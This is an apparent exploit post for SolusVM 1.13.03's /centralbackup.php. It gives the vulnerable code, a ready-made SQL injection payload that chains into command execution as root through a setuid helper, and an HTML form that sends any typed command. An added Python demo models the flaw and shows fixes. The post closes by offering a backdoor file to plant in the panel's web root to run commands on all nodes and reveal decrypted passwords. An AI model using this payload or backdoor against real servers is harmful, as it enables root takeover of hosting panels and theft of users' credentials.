

SolusVM 1.13.03 SQL injection

Source: Internet  Author: Anonymous  Time: 2015-10-19 08:42
Starting this post with that image seemed appropriate. This one is really easy, and lots of servers use this crap called SolusVM.
/centralbackup.php (trimmed; the injection point and the sink are marked):
<?php
if ($_POST['delete']) {
    // SQL injection: the POST value is concatenated straight into the query text,
    // so a UNION in deleteid lets the attacker choose every column of $xc.
    $xc = $db -> query('SELECT * FROM centralbackup WHERE id = \'' . $_POST['deleteid'] . '\'', true);
    #[...]
    if ($xc['status'] == 'failed') {
           // Command injection: row values go unescaped into a /bin/sh command line,
           // so a ';' in the filename column ends the bus.php command and starts another.
           exec('php /usr/local/solusvm/system/bus.php -- --comm=deletebackup --serverid=' . $xc['bserver'] . ' --nodeid=' . $vdata['nodeid'] . ' --vserverid=' . $vdata['vserverid'] . ' --filename=' . $xc['filename']);
    #[...]
    }
 }
?>
So what do we have here? SQL injection? Yup. exec() on unescaped row data? Yup. A setuid-root helper (solusvmc-node) that runs whatever string you pass to --ebtables as root? Yup.
Let's exploit this, shall we? It's easy, I promise! 3 easy steps:
1. Get yourself an active user with an active VM.
2. Log in, click on the VM, and copy the _v value from the URL's query string.
3. POST to /centralbackup.php?_v=[value] (on the panel's port, 5353) with this body:
delete=1&deleteid=-1' union select 0,0,0,0,0,'failed',';/usr/local/solusvm/core/solusvmc-node --ebtables ";command to run as root";',0#
The UNION row sets status to 'failed' so the exec() branch is taken, and the quoted command string comes back in the column that exec() appends as --filename=, where its leading ';' ends the bus.php command line and hands the rest to the setuid-root solusvmc-node. The trailing '#' comments out the closing quote of the original query.
Or just use this fancy HTML form (fill in the host and the _v value, type the command to run as root, and submit):
<html><body>
    <script>
    <!-- construct() wraps whatever was typed in the box into the UNION payload above before the form is submitted -->
    function construct() {
        var sql='-1\' union select 0,0,0,0,0,\'failed\',\';/usr/local/solusvm/core/solusvmc-node --ebtables ";'+document.forms['form']['deleteid'].value+'";\',0#';
        document.forms['form']['deleteid'].value=sql;
        return true;
    }
    </script>
    <!-- CHANGE_ME: the panel host and the _v value copied from the VM page -->
    <form name='form' method='post' action='http://CHANGE_ME:5353/centralbackup.php?_v=CHANGE_ME' onsubmit="return construct();">
    <input type='hidden' name='delete' value='1'>
    CMD: <input type='text' name='deleteid' size='100'>
    <br><input type='submit'>
    </form>
</body></html>
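To show exactly what the two bugs do, and what closes them, here is an added Python example (not code from this post and not SolusVM's own code) that models /centralbackup.php against an in-memory SQLite table. Everything in it is an assumption made for the demo: the table only needs id, status, bserver and filename for the page's snippet, so the other column names are placeholders and the column count (8) is taken from the number of values in the UNION payload; the nodeid and vserverid values are invented; ROOT_CMD stands in for the post's "command to run as root"; and the payload ends in '--' instead of the post's '#' because SQLite has no '#' line comment. vulnerable_lookup and build_command_string mirror the PHP, shell_commands shows how /bin/sh splits the resulting line, and safe_lookup, is_safe_filename and build_argv are the hardened versions (parameterised query, allowlisted filename, shell-free argument vector).

```python
import re
import shlex
import sqlite3

# Stand-in for the centralbackup table. The page's snippet only names id, status,
# bserver and filename; the other column names are assumed placeholders, and the
# column count (8) is taken from the number of values in the UNION payload.
SCHEMA = """CREATE TABLE centralbackup (
    id INTEGER, col2 TEXT, col3 TEXT, col4 TEXT,
    bserver TEXT, status TEXT, filename TEXT, col8 TEXT)"""

# Constructed sample row: a backup that completed normally.
SAMPLE_ROW = (7, "x", "x", "x", "3", "complete", "vm101-20151019.tar.gz", "x")

ROOT_CMD = "id > /tmp/pwned"  # placeholder for the post's "command to run as root"

# The post's payload. It ends in '#' (a MySQL line comment); SQLite, used here so the
# example runs offline, only understands '--', so that is what closes it instead.
PAYLOAD = ("-1' union select 0,0,0,0,0,'failed',"
           "';/usr/local/solusvm/core/solusvmc-node --ebtables \"" + ROOT_CMD + "\";',0-- ")


def open_db():
    conn = sqlite3.connect(":memory:")
    conn.row_factory = sqlite3.Row
    conn.execute(SCHEMA)
    conn.execute("INSERT INTO centralbackup VALUES (?,?,?,?,?,?,?,?)", SAMPLE_ROW)
    return conn


def vulnerable_lookup(conn, deleteid):
    """Mirrors the PHP: the POST value is spliced into the SQL text, so the UNION
    turns an attacker-chosen row into the query result."""
    sql = "SELECT * FROM centralbackup WHERE id = '" + deleteid + "'"
    return conn.execute(sql).fetchone()


def build_command_string(row, nodeid="1", vserverid="1"):
    """Mirrors the exec() argument: row columns concatenated into one shell line."""
    return ("php /usr/local/solusvm/system/bus.php -- --comm=deletebackup"
            " --serverid=" + str(row["bserver"]) + " --nodeid=" + nodeid +
            " --vserverid=" + vserverid + " --filename=" + str(row["filename"]))


def shell_commands(cmdline):
    """Tokenise the way /bin/sh -c would and split on ';' to show what really runs."""
    lex = shlex.shlex(cmdline, posix=True, punctuation_chars=";")
    commands, current = [], []
    for tok in lex:
        if tok == ";":
            if current:
                commands.append(current)
                current = []
        else:
            current.append(tok)
    if current:
        commands.append(current)
    return commands


def safe_lookup(conn, deleteid):
    """Hardened query: the value is bound as a parameter and never parsed as SQL."""
    return conn.execute("SELECT * FROM centralbackup WHERE id = ?", (deleteid,)).fetchone()


FILENAME_RE = re.compile(r"[A-Za-z0-9._-]+")


def is_safe_filename(name):
    """Allowlist for the one value that reaches the command line."""
    return FILENAME_RE.fullmatch(name) is not None


def build_argv(row, nodeid="1", vserverid="1"):
    """Hardened sink: an argument vector for a shell-free spawn (the PHP analogue is
    escapeshellarg() on each value, or proc_open() with an array command in 7.4+),
    plus the allowlist so even a forged row cannot smuggle shell syntax."""
    filename = str(row["filename"])
    if not is_safe_filename(filename):
        raise ValueError("refusing suspicious backup filename: %r" % filename)
    return ["php", "/usr/local/solusvm/system/bus.php", "--", "--comm=deletebackup",
            "--serverid=" + str(row["bserver"]), "--nodeid=" + nodeid,
            "--vserverid=" + vserverid, "--filename=" + filename]


if __name__ == "__main__":
    db = open_db()
    row = vulnerable_lookup(db, PAYLOAD)
    print("injected row status:", row["status"])
    for cmd in shell_commands(build_command_string(row)):
        print("shell would run:", cmd)
    print("parameterised lookup with payload:", safe_lookup(db, PAYLOAD))
    print("argv for the real row:", build_argv(safe_lookup(db, "7")))
```

Run it and the vulnerable path prints two commands, the second being solusvmc-node --ebtables with the attacker's string, while the parameterised lookup returns nothing for the payload and build_argv refuses the forged filename outright. Fixing only the SQL is not enough on its own: any row whose filename column can be influenced would still reach exec(), which is why the sink is hardened as well.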
And, as a bonus, here's something to help you pwn: just wget it to /usr/local/solusvm/www/rofl.php.
It can run a command on all nodes, show decrypted passwords for all users, and so on.